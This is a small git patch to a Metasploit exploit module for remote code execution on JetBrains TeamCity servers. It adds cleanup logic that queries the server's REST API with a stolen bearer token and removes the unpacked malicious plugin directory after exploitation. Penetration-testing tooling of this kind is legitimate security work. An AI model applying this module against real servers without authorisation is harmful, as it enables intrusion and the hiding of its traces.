From 30e761831e007851f56e9df3c0ac8b4e774ff8e0 Mon Sep 17 00:00:00 2001 From: sfewer-r7 Date: Fri, 23 Feb 2024 14:00:27 +0000 Subject: [PATCH] we can also register this path for cleanup --- .../multi/http/jetbrains_teamcity_rce_0day.rb | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb b/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb index 9b42202b7e..2bcb27059d 100644 --- a/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb +++ b/modules/exploits/multi/http/jetbrains_teamcity_rce_0day.rb @@ -346,6 +346,16 @@ class MetasploitModule < Msf::Exploit::Remote print_warning('Could not discover install path. Unable to register files for cleanup.') end + # On a Linux target we see the extracted plugin file remaining here even after we delete the plugin. + # /home/teamcity/.BuildServer/system/caches/plugins.unpacked/XXXXXXXX/ + if (data_path = get_data_dir_path(token_value)) + vprint_status("Target data directory path: #{data_path}") + + register_dir_for_cleanup([data_path, 'system', 'caches', 'plugins.unpacked', plugin_name].join(sep)) + else + print_warning('Could not discover data directory path. Unable to register files for cleanup.') + end + # # 7. Trigger the payload and get a session. ARCH_JAVA JSP payloads need us to hit an endpoint. ARCH_JAVA Java # payloads and ARCH_CMD payloads are triggered upon enabling a loaded plugin. @@ -423,6 +433,23 @@ class MetasploitModule < Msf::Exploit::Remote nil end + def get_data_dir_path(token_value) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server', 'dataDirectoryPath'), + 'headers' => { + 'Authorization' => "Bearer #{token_value}" + } + ) + + unless res&.code == 200 + print_warning('Failed to request data directory path.') + return nil + end + + res.body + end + def get_build_number(token_value) res = send_request_cgi( 'method' => 'GET',